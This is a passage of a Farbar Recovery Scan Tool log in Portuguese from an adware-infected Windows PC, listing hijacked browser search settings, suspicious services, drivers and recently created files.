hxxp://www.mystartsearch.com/web/?utm_source=b&utm_medium=cmi&utm_campaign=install_ie&utm_content=ds&from=cmi&uid=SAMSUNGXHD322HJ_S1RLJ50SA65887&ts=1437526173&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-1755460986-2849130812-3623152037-1000 -> {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxp://www.mystartsearch.com/web/?utm_source=b&utm_medium=cmi&utm_campaign=install_ie&utm_content=ds&from=cmi&uid=SAMSUNGXHD322HJ_S1RLJ50SA65887&ts=1437526173&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-1755460986-2849130812-3623152037-1000 -> {ielnksrch} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfVgNBQlHEwASbQsNVgxcFQ0WJBRZUQlGDAAVdQsNUQgTRQVGJh9aFQQTSEcFME0FCFwEURNNfWpdAEsSSXhMMlxzD1YG&q={searchTerms} BHO: Many Results Hub -> {be1a5d83-523d-4a57-bc56-65afe77fd42a} -> C:\Program Files\Many Results Hub\Extensions\be1a5d83-523d-4a57-bc56-65afe77fd42a.dll => Nenhum Arquivo BHO: YTAHelper -> {FCE3FA8B-BA81-467C-81D8-E43C00D1BC71} -> C:\ProgramData\YTAHelper\YTAHelper.dll [2015-02-22] (Goobzo Ltd.) Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll [2009-02-26] (Microsoft Corporation) Handler: WSWSVCUchrome - Nenhum Valor CLSID - FireFox: ======== FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll [2015-01-06] () FF Plugin: @microsoft.com/GENUINE -> disabled [Nenhum Arquivo] FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation) FF Plugin: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation) FF Plugin: @pandonetworks.com/PandoWebPlugin -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll [Nenhum Arquivo] FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-08-09] (Google Inc.) FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-08-09] (Google Inc.) FF Plugin: @videolan.org/vlc,version=2.2.0 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2015-02-27] (VideoLAN) FF Plugin: @videolan.org/vlc,version=2.2.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2015-02-27] (VideoLAN) FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-09-26] (Adobe Systems Inc.) FF Plugin HKU\S-1-5-21-1755460986-2849130812-3623152037-1000: @tools.google.com/Google Update;version=3 -> C:\Users\Cliente NS\AppData\Local\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-11] (Google Inc.) FF Plugin HKU\S-1-5-21-1755460986-2849130812-3623152037-1000: @tools.google.com/Google Update;version=9 -> C:\Users\Cliente NS\AppData\Local\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-11] (Google Inc.) FF Plugin HKU\S-1-5-21-1755460986-2849130812-3623152037-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Cliente NS\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-08-10] (Unity Technologies ApS) Chrome: ======= CHR dev: Chrome dev build detectado! <======= ATENÇÃO CHR HomePage: Default -> hxxp://opatolo.ru/?utm_content=83d5920a52d67260f4213f8bddf9126c&utm_source=startpm&utm_term=A303D40284C212FCDFB1DD53FC8C53A3 CHR StartupUrls: Default -> "hxxp://opatolo.ru/?utm_content=83d5920a52d67260f4213f8bddf9126c&utm_source=startpm&utm_term=A303D40284C212FCDFB1DD53FC8C53A3" CHR DefaultSearchURL: Default -> hxxp://go-search.ru/search?q={searchTerms} CHR DefaultSearchKeyword: Default -> GoSearch CHR DefaultSuggestURL: Default -> hxxp://suggest.yandex.net/suggest-ff.cgi?part={searchTerms} CHR Profile: C:\Users\Cliente NS\AppData\Local\Google\Chrome\User Data\Default CHR Extension: (Sem Nome) - C:\Users\Cliente NS\AppData\Local\Google\Chrome\User Data\Default\Extensions\bjgfnbgjnmeohehminfenoahkcddidpi [2016-02-18] CHR Extension: (Sem Nome) - C:\Users\Cliente NS\AppData\Local\Google\Chrome\User Data\Default\Extensions\chbcakcafkeacjljckffjnmliiikgoag [2016-03-11] CHR Extension: (Wiki Search.me) - C:\Users\Cliente NS\AppData\Local\Google\Chrome\User Data\Default\Extensions\fcgnigmofekcllgbiejhmigggmgehkip [2016-02-18] CHR Extension: (Universal Search List) - C:\Users\Cliente NS\AppData\Local\Google\Chrome\User Data\Default\Extensions\fcimjkehglmijlhnpbmjbpoiamjiegod [2016-03-15] CHR Extension: (Easy Search) - C:\Users\Cliente NS\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdnadicfhkbpdafdildanpbjapjlmkab [2016-02-11] CHR Extension: (Chrome Web Store Payments) - C:\Users\Cliente NS\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-02-11] CHR HKLM\...\Chrome\Extension: [fcgnigmofekcllgbiejhmigggmgehkip] - hxxps://clients2.google.com/service/update2/crx CHR HKLM\...\Chrome\Extension: [fcimjkehglmijlhnpbmjbpoiamjiegod] - hxxp://clients2.google.com/service/update2/crx CHR HKLM\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx CHR HKU\S-1-5-21-1755460986-2849130812-3623152037-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [apdfllckaahabafndbhieahigkjlhalf] - C:\Users\CLIENT~1\AppData\Local\Google\Drive\apdfllckaahabafndbhieahigkjlhalf_live.crx CHR HKU\S-1-5-21-1755460986-2849130812-3623152037-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcimjkehglmijlhnpbmjbpoiamjiegod] - hxxp://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-1755460986-2849130812-3623152037-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh] - hxxps://clients2.google.com/service/update2/crx StartMenuInternet: Google Chrome.2LKXJBTGZYBLQEJ5YZQAIS5LTE - c:\users\cliente ns\appdata\local\google\chrome\application\chrome.exe ==================== Serviços (Whitelisted) ======================== (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.) R2 ApplicationHosting; C:\ProgramData\\ApplicationHosting\\ApplicationHosting.exe [807936 2015-10-14] () [Arquivo não assinado] R2 ApptnioPhtooteulB; C:\ProgramData\\ApptnioPhtooteulB\\ApptnioPhtooteulB.exe [807936 2015-10-14] () [Arquivo não assinado] R2 BluetoothPoint; C:\ProgramData\\BluetoothPoint\\BluetoothPoint.exe [807936 2015-10-14] () [Arquivo não assinado] <==== ATENÇÃO R2 Checker; C:\Program Files\Checker\check.exe [376832 2015-07-20] () [Arquivo não assinado] S3 cphs; C:\Windows\system32\IntelCpHeciSvc.exe [279024 2013-11-15] (Intel Corporation) R2 cqcontainerconlntrols; C:\Program Files\cqcontainerconlntrols\cqcontainerconlntrols.exe [7596281 2015-08-03] () [Arquivo não assinado] <==== ATENÇÃO R2 iSafeService; C:\Program Files\Elex-tech\YAC\iSafeSvc.exe [118048 2015-08-19] (Elex do Brasil Participações Ltda) R2 NetTcpHandler; C:\Users\Cliente NS\AppData\Roaming\NetService\netservice.exe [173088 2015-07-08] () R2 sNqAOqZuj; C:\ProgramData\ZVXGRAuNbf\sNqAOqZuj.exe [2321728 2014-10-09] (Green Fire Software) S2 SPBIUpd; C:\Program Files\Common Files\ShopperPro\spbiu.exe [1813504 2015-02-25] (ShopperPro) [Arquivo não assinado] R2 TheCalendarService; C:\Program Files\CalendarTool\2.0.0.11189\CalendarServ.exe [141960 2015-12-25] () R2 TuneUp.UtilitiesSvc; C:\Program Files\TuneUp Utilities 2014\TuneUpUtilitiesService32.exe [1781048 2015-06-25] (TuneUp Software) R2 WinNetSvc; C:\Users\Cliente NS\AppData\Roaming\WinNetSvc\WinNetSvc.exe [4845408 2015-12-16] () R2 winzipersvc; C:\Program Files\WinZipper\winzipersvc.exe [682240 2016-02-16] (Winzipper Pvt Ltd.) <==== ATENÇÃO R2 Zitenop; C:\ProgramData\\Zitenop\\Zitenop.exe [807936 2015-10-14] () [Arquivo não assinado] S2 AdobeARMservice; "C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe" [X] S2 BavMiniService; "C:\ProgramData\Baidu\Antivirus\BavMSService.exe" -r [X] S3 ExtTag; C:\ProgramData\ExtTag\ExtTag [X] S2 gupdate; "C:\Program Files\Google\Update\GoogleUpdate.exe" /svc [X] S3 gupdatem; "C:\Program Files\Google\Update\GoogleUpdate.exe" /medsvc [X] S2 NSCP Service; C:\Program Files\nscp\nscp.exe [X] S2 wssvc_1.10.0.20; "C:\Program Files\WordShark_1.10.0.20\Service\wssvc.exe" [X] S2 YouTubeAcceleratorService; C:\PROGRA~1\YOUTUB~1\YouTubeAcceleratorService.exe -start -scm [X] ===================== Drivers (Whitelisted) ========================== (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.) R3 AmUStor; C:\Windows\System32\drivers\AmUStor.SYS [70424 2013-07-18] (Alcor Micro, Corp.) S3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [26168 2015-12-14] (Disc Soft Ltd) S3 dtliteusbbus; C:\Windows\System32\DRIVERS\dtliteusbbus.sys [40504 2015-12-14] (Disc Soft Ltd) R1 iSafeKrnl; C:\Program Files\Elex-tech\YAC\iSafeKrnl.sys [225896 2015-05-14] (Elex do Brasil Participações Ltda) S3 iSafeKrnlBoot; C:\Windows\System32\DRIVERS\iSafeKrnlBoot.sys [50280 2015-08-19] (Elex do Brasil Participações Ltda) R1 iSafeKrnlKit; C:\Program Files\Elex-tech\YAC\iSafeKrnlKit.sys [97912 2015-08-19] (Elex do Brasil Participações Ltda) R1 iSafeKrnlMon; C:\Program Files\Elex-tech\YAC\iSafeKrnlMon.sys [45032 2015-08-19] (Elex do Brasil Participações Ltda) R1 iSafeKrnlR3; C:\Program Files\Elex-tech\YAC\iSafeKrnlR3.sys [73232 2015-08-19] (Elex do Brasil Participações Ltda) R1 iSafeNetFilter; C:\Windows\System32\DRIVERS\iSafeNetFilter.sys [44712 2015-06-29] (Elex do Brasil Participações Ltda) R1 ISODrive; C:\Program Files\UltraISO\drivers\ISODrive.sys [82168 2013-11-21] (EZB Systems, Inc.) R0 iusb3hcs; C:\Windows\System32\DRIVERS\iusb3hcs.sys [16880 2013-07-17] (Intel Corporation) R3 MEI; C:\Windows\System32\DRIVERS\HECI.sys [56432 2013-01-23] (Intel Corporation) R0 MPCBase; C:\Windows\System32\drivers\MPCBase.sys [29032 2016-03-16] (DotC United Inc) S3 SPBIUpdd; C:\Program Files\Common Files\ShopperPro\spbiw.sys [26112 2015-02-25] () [Arquivo não assinado] S3 TuneUpUtilitiesDrv; C:\Program Files\TuneUp Utilities 2014\TuneUpUtilitiesDriver32.sys [30632 2015-06-04] (TuneUp Software) S3 xnacc; C:\Windows\System32\DRIVERS\xnacc.sys [465408 2009-07-13] (Microsoft Corporation) S3 BprotectEx; \??\C:\Windows\System32\drivers\BprotectEx.sys [X] S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X] S1 mosfilterdrv; system32\drivers\mosfilterdrv.sys [X] S1 nscp_cnb; system32\drivers\nscp_cnb.sys [X] S1 pa_sys_config; system32\drivers\pa_sys_config.sys [X] S1 pa_sys_config"register; system32\drivers\pa_sys_config"register.sys [X] S1 pa_sys_config"unregister; system32\drivers\pa_sys_config"unregister.sys [X] S3 PCFApiUtil; \??\C:\Program Files\Baidu Security\PC Faster\4.0.0.0\PCFApiUtil.sys [X] S1 pofilterdrv; system32\drivers\pofilterdrv.sys [X] S1 qknfd; system32\drivers\qknfd.sys [X] U5 UnlockerDriver5; C:\Program Files\Unlocker\UnlockerDriver5.sys [4096 2010-07-04] () [Arquivo não assinado] S1 wsfd_vt_1_10_0_20; system32\drivers\wsfd_vt_1_10_0_20.sys [X] ==================== NetSvcs (Whitelisted) =================== (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.) ==================== Um Mês Criados arquivos e pastas ======== (Se uma entrada for incluída na fixlist, o arquivo/pasta será movido.) 2016-03-17 07:58 - 2016-03-17 07:58 - 00001151 _____ C:\Users\Public\Desktop\DriverScanner.lnk 2016-03-17 07:58 - 2016-03-17 07:58 - 00000338 _____ C:\Windows\Tasks\dsmonitor.job 2016-03-17 07:58 - 2016-03-17 07:58 - 00000278 _____ C:\Windows\Tasks\DriverScanner.job 2016-03-17 07:53 - 2016-03-17 08:20 - 00000000 ____D C:\FRST 2016-03-17 07:52 - 2016-03-17 07:52 - 01725440 _____ (Farbar) C:\Users\Cliente NS\Downloads\FRST.exe 2016-03-17 07:52 - 2016-03-17 07:52 - 01725440 _____ (Farbar) C:\Users\Cliente NS\Downloads\FRST (1).exe 2016-03-17 07:52 - 2016-03-17 07:52 - 00000000 ____D C:\Program Files\Uniblue 2016-03-17 07:36 - 2016-03-17 07:36 - 00000000 ____D C:\Users\Cliente NS\AppData\LocalLow\BitTorrent 2016-03-16 23:08 - 2016-03-17 02:46 - 06000640 _____ C:\Program Files\GUTA554.tmp 2016-03-16 23:08 - 2016-03-16 23:08 - 00000000 ____D C:\Program Files\GUMA553.tmp 2016-03-16 23:03 - 2016-03-16 23:03 - 00000000 ____D C:\Users\Cliente NS\AppData\Roaming\Dybeiomev 2016-03-16 23:03 - 2016-03-16 23:03 - 00000000 ____D C:\Users\Cliente NS\AppData\Roaming\AeooDipd 2016-03-16 22:59 - 2016-03-16 22:59 - 00000000 ____D C:\Users\Todos os Usuários\e073bc94-48e3-1 2016-03-16 22:59 - 2016-03-16 22:59 - 00000000 ____D C:\ProgramData\e073bc94-48e3-1 2016-03-16 22:50 - 2016-03-16 22:50 - 00000000 ____D C:\Users\Todos os Usuários\e073bc94-0a63-1 2016-03-16 22:50 - 2016-03-16 22:50 - 00000000 ____D C:\ProgramData\e073bc94-0a63-1 2016-03-16 21:27 - 2016-03-16 21:27 - 00299008 _____ C:\Windows\fnz.exe 2016-03-16 21:18 - 2016-03-16 21:18 - 00000000 ____D C:\Users\Todos os Usuários\Uniblue 2016-03-16 21:18 - 2016-03-16 21:18 - 00000000 ____D C:\ProgramData\Uniblue 2016-03-16 21:02 - 2016-03-16 21:02 - 00000000 ____D C:\Users\Todos os Usuários\pWdMp 2016-03-16 21:02 - 2016-03-16 21:02 - 00000000 ____D C:\Users\Todos os Usuários\e073bc94-0a55-1 2016-03-16 21:02 - 2016-03-16 21:02 - 00000000 ____D C:\ProgramData\pWdMp 2016-03-16 21:02 - 2016-03-16 21:02 - 00000000 ____D C:\ProgramData\e073bc94-0a55-1 2016-03-16 21:01 - 2016-03-16 21:03 - 00000967 _____ C:\Windows\system32\${LOGFILE} 2016-03-16 21:00 - 2016-03-16 21:00 - 00000000 ____D C:\Program Files\SunnyDayApps 2016-03-16 20:57 - 2016-03-16 22:56 - 00000000 ____D C:\Users\Cliente NS\AppData\Roaming\WTools 2016-03-16 20:57 - 2016-03-16 22:55 - 00000000 ____D C:\Users\Cliente NS\AppData\Roaming\Store 2016-03-16 20:55 - 2016-03-16 21:03 - 00000000 ____D C:\Users\Cliente NS\AppData\Roaming\Nosibay 2016-03-16 20:55 - 2016-03-16 20:55 - 00000000 ____D C:\Users\Todos os Usuários\FWdMF 2016-03-16 20:55 - 2016-03-16 20:55 - 00000000 ____D C:\ProgramData\FWdMF 2016-03-16 20:54 - 2016-03-16 23:17 - 00000000 ____D C:\Users\Cliente NS\AppData\Roaming\mysites123 2016-03-16 20:53 - 2016-03-16 23:03 - 00030112 _____ () C:\Windows\system32\Drivers\bsdriver.sys 2016-03-16 20:53 - 2016-03-16 23:03 - 00000000 ____D C:\Users\Cliente NS\AppData\Local\Tempfolder 2016-03-16 20:53 - 2016-03-16 22:58 - 00000000 ____D C:\Program Files\groover160320161936 2016-03-16 20:53 - 2016-03-16 21:23 - 00000000 ____D C:\Program Files\Hostify 2016-03-16 20:53 - 2016-03-16 20:53 - 00000000 ____D C:\Users\Cliente NS\AppData\Roaming\Nukwiukw 2016-03-16 20:53 - 2016-03-16 20:53 - 00000000 ____D C:\Users\Cliente NS\AppData\Roaming\CaarrIgomda 2016-03-16 20:53 - 2016-03-16 20:53 - 00000000 ____D C:\Users\Cliente NS\AppData\LocalLow\Company 2016-03-16 20:53 - 2016-03-16 20:53 - 00000000 ____D C:\Users\Cliente NS\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A} 2016-03-16 20:53 - 2016-03-16 20:53 - 00000000 ____D C:\uninst 2016-03-16 20:50 - 2016-03-16 23:10 - 00000000 ____D C:\Users\Cliente NS\AppData\Local\app 2016-03-16 20:37 - 2016-03-16 21:15 - 00000308 _____ C:\Windows\Tasks\Price Fountain.job 2016-03-16 20:36 - 2016-03-16 22:57 - 00000000 ____D C:\Users\Cliente NS\AppData\Local\PriceFountain 2016-03-16 20:36 - 2016-03-16 20:36 - 00000000 ____D C:\Users\Todos os Usuários\e073bc94-1ad7-1 2016-03-16 20:36 - 2016-03-16 20:36 - 00000000 ____D C:\Users\Cliente NS\AppData\Roaming\PriceFountain 2016-03-16 20:36 - 2016-03-16 20:36 - 00000000 ____D C:\ProgramData\e073bc94-1ad7-1 2016-03-16 20:32 - 2016-03-17 07:56 - 00000000 ____D C:\Users\Cliente NS\AppData\Local\Setup Wizard 2016-03-16 20:27 - 2016-03-17 07:42 - 00000000 ____D C:\Program Files\MyBestOffersToday 2016-03-16 20:27 - 2016-03-16 20:29 - 00000000 ____D C:\Program Files\UCBrowser 2016-03-16 20:26 - 2016-03-16 20:26 - 00000000 ____D C:\Users\Todos os Usuários\WindowsMsg 2016-03-16 20:26 - 2016-03-16 20:26 - 00000000 ____D C:\ProgramData\WindowsMsg 2016-03-16 20:25 - 2016-03-16 23:04 - 00052968 _____ (DotC United Inc) C:\Windows\system32\Drivers\MPCKpt.sys 2016-03-16 20:25 - 2016-03-16 23:04 - 00029032 _____ (DotC United Inc) C:\Windows\system32\Drivers\MPCBase.sys 2016-03-16 20:25 - 2016-03-16 20:25 - 00000000 ____D C:\Program Files\Windows Screen Manager 2016-03-16 20:23 - 2016-03-17 07:33 - 00000518 _____ C:\Windows\Tasks\BaiduJP_Update_{8099779F-A13B-403e-B39A-65133857586B}.job 2016-03-16 20:23 - 2016-03-16 23:04 - 00000000 ____D C:\Program Files\MPC Cleaner 2016-03-16 20:23 - 2016-03-16 23:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MYBESTOFFERSTODAY 2016-03-16 20:23 - 2016-03-16 20:54 - 00000000 ____D C:\Program Files\win_en_77 2016-03-16 20:23 - 2016-03-16 20:23 - 00000000 ____D C:\Users\Cliente NS\AppData\Local\win_en_77 2016-03-16 20:23 - 2016-03-16 20:23 - 00000000 ____D C:\Program Files\Baidu 2016-03-16 20:22 - 2016-03-17 07:39 - 00000000 ____D C:\Users\Cliente NS\AppData\Local\mbot_en_037050269 2016-03-16 20:22 - 2016-03-16 23:00 - 00000000 ____D C:\Program Files\mbot_en_037050269 2016-03-16 20:21 - 2016-03-16 20:21 - 00000000 ____D C:\Users\Cliente NS\AppData\Roaming\UPUpdata 2016-03-16 20:21 - 2016-03-16 20:21 - 00000000 ____D C:\Program Files\badu 2016-03-16 20:20 - 2016-03-17 07:33 - 00000000 ____D C:\Program Files\CleanBrowser 2016-03-16 20:20 - 2016-03-16 23:11 - 00000000 ____D C:\Program Files\SpaceSoundPro 2016-03-16 20:20 - 2016-03-16 23:08 - 00000000 ____D C:\Program Files\Max Driver Updater 2016-03-16 17:33 - 2016-03-16 17:36 - 00000000 ____D C:\Users\Cliente NS\Downloads\TWD - Vol. 17 (Algo A Temer) [PortableMediaBR] 2016-03-16 17:26 - 2016-03-16 17:26 - 00026282 _____ C:\Users\Cliente NS\Downloads\[kat.cr]the.walking.dead.hqs.comics.01.há.134.pt.br.hq.torrents.torrent 2016-03-16 17:08 - 2016-03-16 17:18 - 119302113 _____ C:\Users\Cliente NS\Downloads\TWD - Vol. 17 (Algo A Temer) [PortableMediaBR].rar 2016-03-16 12:25 - 2016-03-16 12:25 - 00000000 ____D C:\Users\Cliente NS\AppData\Local\032B0290-1458131117-05FE-1D06-100700080009 2016-03-16 12:20 - 2016-03-16 12:20 - 00000000 ____D C:\Program Files\032B0290-1458141626-05FE-1D06-100700080009 2016-03-16 12:14 - 2016-03-16 22:52 - 00000000 ____D C:\Users\Cliente NS\AppData\Roaming\CalendarTool 2016-03-16 12:14 - 2016-03-16 12:14 - 01736192 _____ C:\Users\Todos os Usuários\upgsvr.exe 2016-03-16 12:14 - 2016-03-16 12:14 - 01736192 _____ C:\ProgramData\upgsvr.exe 2016-03-16 12:14 - 2016-03-16 12:14 - 00621568 _____ (The OpenSSL Project, hxxp://www.openssl.org/) C:\Users\Cliente NS\AppData\Roaming\libeay32.dll 2016-03-16 12:14 - 2016-03-16 12:14 - 00162304 _____ (The OpenSSL Project, hxxp://www.openssl.org/) C:\Users\Cliente NS\AppData\Roaming\ssleay32.dll 2016-03-16 12:14 - 2016-03-16 12:14 - 00000000 ____D C:\Users\Public\Documents\Tools 2016-03-16 12:14 - 2016-03-16 12:14 - 00000000 ____D C:\Users\Cliente NS\AppData\Roaming\LightGate 2016-03-16 12:14 - 2016-03-16 12:14 - 00000000 ____D C:\Program Files\CalendarTool 2016-03-16 12:14 - 2015-12-10 07:39 - 01015808 _____ (d) C:\Users\Cliente NS\AppData\Roaming\download.exe 2016-03-16 12:13 - 2016-03-16 12:15 - 03962192 _____ C:\Users\Cliente NS\AppData\Roaming\ad94de122951.exe 2016-03-16 12:13 - 2016-03-16 12:13 - 00000000 ____D C:\Users\Todos os Usuários\Windows Update 2016-03-16 12:13 - 2016-03-16 12:13 - 00000000 ____D C:\Users\Cliente NS\AppData\Local\Yeaplayer 2016-03-16 12:13 - 2016-03-16 12:13 - 00000000 ____D C:\ProgramData\Windows Update 2016-03-16 12:13 - 2015-11-14 20:08 - 02496403 _____ ( ) C:\Users\Cliente NS\AppData\Roaming\yeaplayer_51472.exe 2016-03-16 12:12 - 2016-03-16 20:17 - 00011633 _____ C:\Users\Cliente NS\AppData\Roaming\webad.xml 2016-03-16 12:12 - 2016-03-16 12:14 - 02786816 _____ (TODO: ) C:\Users\Cliente NS\AppData\Roaming\svrupg.exe 2016-03-16 12:12 - 2016-03-02 10:49 - 01888256 _____ C:\Users\Cliente NS\AppData\Roaming\msiql.exe 2016-03-16 12:12 - 2016-01-11 14:49 - 01734656 _____ C:\Users\Todos os Usuários\service.exe 2016-03-16 12:12 - 2016-01-11 14:49 - 01734656 _____ C:\Users\Cliente NS\AppData\Roaming\service.exe 2016-03-16 12:12 - 2016-01-11 14:49 - 01734656 _____ C:\ProgramData\service.exe 2016-03-16 11:08 - 2016-03-16 23:03 - 00049408 _____ (Cherimoya Ltd) C:\Windows\system32\Drivers\cherimoya.sys 2016-03-15 22:00 - 2016-03-15 22:00 - 12051419 _____ C:\Users\Cliente NS\Downloads\Guerra Civil - Prologo #04.pdf 2016-03-15 11:19 - 2016-03-15 11:20 - 00000000 ____D C:\Users\Cliente NS\Desktop\Wallpapers 2016-03-15 10:52 - 2016-03-15 10:52 - 00000000 ____D C:\Users\Cliente NS\Downloads\Mike Posner - 31 Minutes to Takeoff [HitseBeats] 2016-03-15 10:38 - 2016-03-15 10:38 - 00000000 ____D C:\Users\Cliente NS\AppData\Roaming\WMPNetworkAcSvc 2016-03-15 10:38 - 2016-03-15 10:38 - 00000000 _____ C:\END 2016-03-14 16:17 - 2016-03-14 16:17 - 09437525 _____ C:\Users\Cliente NS\Downloads\LasPlagas_Type2by_adngel.zip 2016-03-14 15:13 - 2016-03-16 21:02 - 00000000 ____D C:\Users\Cliente NS\AppData\Roaming\XBox 2016-03-14 15:12 - 2016-03-14 15:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FrivLauncher 2016-03-14 01:35 - 2016-03-14 01:38 - 81449290 _____ C:\Users\Cliente NS\Downloads\Mike Posner - 31 Minutes to Takeoff [HitseBeats].zip 2016-03-14 01:22 - 2016-03-14 01:26 - 07332384 _____ C:\Users\Cliente NS\Downloads\2_Chainz_-_In_Town_feat_Mike_Posner.m4a 2016-03-13 21:31 - 2016-03-13 21:43 - 07121865 _____ C:\Users\Cliente NS\Downloads\Mike Posner - Top of the World (feat. Big Sean).m4a 2016-03-12 21:08 - 2016-03-12 21:08 - 00019880 _____ C:\Users\Cliente NS\Downloads\Vikings.S01.BluRay.720p.Dublado.rar 2016-03-12 18:41 - 2016-03-12 18:41 - 00054576 _____ C:\Users\Cliente NS\Desktop\CARTEIRA DE ESUDANTE.pdf 2016-03-12 12:23 - 2016-03-12 12:24 - 26187046 _____ C:\Users\Cliente NS\Downloads\Resident Evil 20th Anniversary Special.mp4 2016-03-12 10:44 - 2016-03-12 10:44 - 00081642 _____ C:\Users\Cliente NS\Downloads\Shadowhunters-S01E09.zip 2016-03-12 09:25 - 2016-03-12 09:25 - 00001083 _____ C:\Users\Cliente NS\Documents\RE2.txt 2016-03-12 09:15 - 2016-03-12 09:15 - 00000526 _____ C:\Users\Cliente NS\Documents\RE.txt 2016-03-11 21:36 - 2016-03-11 21:40 - 79899900 _____ C:\Users\Cliente NS\Downloads\Resident Evil Afterlife The Outsider Renholder Mix.mp4 2016-03-11 18:26 - 2016-03-11 18:26 - 00000000 ____D C:\Users\Cliente NS\AppData\Local\{C2A185D2-80B6-48DF-A145-6DC4F4150BD9} 2016-03-11 16:10 - 2016-03-17 08:01 - 00000902 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job 2016-03-11 13:52 - 2016-03-11 13:52 - 00000000 __SHD C:\Users\Todos os Usuários\Windows 7 2016-03-11 13:52 - 2016-03-11 13:52 - 00000000 __SHD C:\ProgramData\Windows 7 2016-03-11 13:35 - 2016-03-11 14:41 - 00000000 __SHD C:\Users\Todos os Usuários\zsqwv 2016-03-11 13:35 - 2016-03-11 14:41 - 00000000 __SHD C:\ProgramData\zsqwv 2016-03-11 08:46 - 2016-03-11 08:46 - 00128368 _____ C:\Users\Cliente NS\Downloads\40BC65B9C8C3BA89E1AC0257B01D92FCE4BD23CB.torrent 2016-03-10 17:27 - 2016-03-10 17:27 - 00000000 ____D C:\Users\Cliente NS\AppData\Local\{F53199AE-2E35-7F0A-7464-536953FC2A85} 2016-03-10 13:38 - 2016-03-10 13:38 - 00000000 ____D C:\Users\Cliente NS\Downloads\Mind of Mine (Deluxe Edition) 2016-03-10 13:35 - 2016-03-10 13:36 - 06994772 _____ C:\Users\Cliente NS\Downloads\Mind of Mine (Deluxe Edition).zip 2016-03-09 20:58 - 2016-03-09 20:59 - 33594800 _____ C:\Users\Cliente NS\Downloads\The Walking Dead We Carry On Season 6 Tribute.mp4 2016-03-09 20:17 - 2016-03-09 20:17 - 00004516 _____ C:\Users\Cliente NS\Downloads\6B366B98532449A9E9563884C485C380EECF9B85.torrent 2016-03-09 17:30 - 2016-03-09 17:31 - 00000000 ____D C:\Users\Cliente NS\AppData\Local\{2A89C2B2-1C91-40FD-B655-1376EF6735C6} 2016-03-08 21:24 - 2016-03-08 21:24 - 00013222 _____ C:\Users\Cliente NS\Downloads\40BF98080F903795AAC8160B745F5B6C40FFF60C.torrent 2016-03-07 14:23 - 2016-03-07 14:23 - 00153945 _____ C:\Users\Cliente NS\Downloads\The_Walking_Dead_span_HDTV_720p_1080p_span_span_S06E12_span_.zip 2016-03-07 14:10 - 2016-03-07 14:10 - 00014499 _____ C:\Users\Cliente NS\Downloads\10E84CBDAF8B4A04491F70B480A0D060D7B0BF09.torrent 2016-03-07 00:07 - 2016-03-07 00:08 - 08991999 _____ C:\Users\Cliente NS\Downloads\The Walking Dead Season 6 Episode 13 The Same Boat Promo HD.mp4 2016-03-06 21:07 - 2016-03-17 07:34 - 00000352 ____H C:\Windows\Tasks\URMLFCUSFLBIUCRY.job 2016-03-06 21:07 - 2016-03-06 21:14 - 00380570 _____ C:\Users\Cliente NS\Downloads\Pokemon - Blue Version (UE)[!].zip 2016-03-06 21:07 - 2016-03-06 21:07 - 00000000 ____D C:\Users\Todos os Usuários\Service7609 2016-03-06 21:07 - 2016-03-06 21:07 - 00000000 ____D C:\Users\Todos os Usuários\7c0535b143fc4671b6ebd202fbffe066 2016-03-06 21:07 - 2016-03-06 21:07 - 00000000 ____D C:\ProgramData\Service7609 2016-03-06 21:07 - 2016-03-06 21:07 - 00000000 ____D C:\ProgramData\7c0535b143fc4671b6ebd202fbffe066 2016-03-06 21:04 - 2016-03-06 21:04 - 00000000 ____D C:\Users\Cliente NS\Desktop\Pokemon 2016-03-06 19:55 - 2016-03-09 15:32 - 00000099 _____ C:\Users\Cliente NS\Desktop\RE.txt 2016-03-06 10:48 - 2016-03-06 